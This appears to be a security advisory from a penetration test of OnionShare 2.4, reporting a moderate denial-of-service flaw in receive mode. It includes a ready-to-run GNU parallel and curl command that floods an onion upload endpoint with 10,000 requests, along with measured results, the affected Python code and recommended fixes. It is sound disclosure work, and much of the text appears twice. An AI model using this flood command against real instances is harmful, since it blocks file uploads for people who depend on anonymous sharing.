Between September 26, 2021 and October 8, 2021, Radically Open Security conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's Red Team lab.
- Vulnerability ID: OTF-012
- Vulnerability type: Denial of Service
- Threat level: Moderate
Description:
The receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.
Technical description:
The following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the ulimit -n configuration is required for it to work. This is sufficient to block file upload on a (public) receive instance.
seq 10000 | parallel --max-args 0 --jobs 6000 "curl -i -s -x socks5h://localhost:9150 -k -X $'POST' -H $'Host: csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: multipart/form-data; boundary=---------------------------19182376703918074873375387042' -H $'Content-Length: 329' -H $'Connection: close' --data-binary $'-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"file[]\"; filename=\"poc.txt\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aA\x0d\x0a-----------------------------19182376703918074873375387042\x0d\x0aContent-Disposition: form-data; name=\"text\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------19182376703918074873375387042--\x0d\x0a' $'http://csqrp3qciewvj5axph4o62jnr6aevhmpxfkydmi3256bprhbusr2ltid.onion/upload-ajax'"
Attack duration was around 80 seconds.
Cases where over 99 requests were sent per second:
Every 0.1s: ls | grep... onionvm: Tue Oct 5 12:17:00 2021
78
Cases where files were successfully written to disk:
Every 0.1s: ls | wc -w onionvm: Tue Oct 5 12:17:00 2021
8399
This means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.
The failsafe is used to prevent creating more than 100 directories per second:
|
# Create that directory, which shouldn't exist yet |
|
try: |
|
os.makedirs(self.receive_mode_dir, 0o700, exist_ok=False) |
|
except OSError: |
|
# If this directory already exists, maybe someone else is uploading files at |
|
# the same second, so use a different name in that case |
|
if os.path.exists(self.receive_mode_dir): |
|
# Keep going until we find a directory name that's available |
|
i = 1 |
|
while True: |
|
new_receive_mode_dir = f"{self.receive_mode_dir}-{i}" |
|
try: |
|
os.makedirs(new_receive_mode_dir, 0o700, exist_ok=False) |
|
self.receive_mode_dir = new_receive_mode_dir |
|
break |
|
except OSError: |
|
pass |
|
i += 1 |
|
# Failsafe |
|
if i == 100: |
|
self.web.common.log( |
|
"ReceiveModeRequest", |
|
"__init__", |
|
"Error finding available receive mode directory", |
|
) |
|
self.upload_error = True |
|
break |
|
except PermissionError: |
|
self.web.add_request( |
|
self.web.REQUEST_ERROR_DATA_DIR_CANNOT_CREATE, |
|
request.path, |
|
{"receive_mode_dir": self.receive_mode_dir}, |
|
) |
|
print( |
|
f"Could not create OnionShare data folder: {self.receive_mode_dir}" |
|
) |
|
self.web.common.log( |
|
"ReceiveModeRequest", |
|
"__init__", |
|
"Permission denied creating receive mode directory", |
|
) |
|
self.upload_error = True |
The limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.
Impact:
An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.
Recommendation:
- Remove this limitation, or
- Derive directory name from milliseconds
Between September 26, 2021 and October 8, 2021, Radically Open Security conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's Red Team lab.
Description:
The receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script.
Technical description:
The following script uses GNU parallel and curl with around 6000 requests in parallel to send 10000 requests. A change in the
ulimit -nconfiguration is required for it to work. This is sufficient to block file upload on a (public) receive instance.Attack duration was around 80 seconds.
Cases where over 99 requests were sent per second:
Cases where files were successfully written to disk:
This means that during the attack time 1601 requests of 10000 were dropped. We tried to upload multiple files in the web interface during the attack and were not successful.
The failsafe is used to prevent creating more than 100 directories per second:
onionshare/cli/onionshare_cli/web/receive_mode.py
Lines 386 to 427 in d08d5f0
The limit of 100 requests/second is significantly lower than the possible network bandwidth and greatly reduces the attack complexity for denial of service. Our test was conducted over the tor network, which showed no limitation for the required bandwidth.
Impact:
An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.
Recommendation: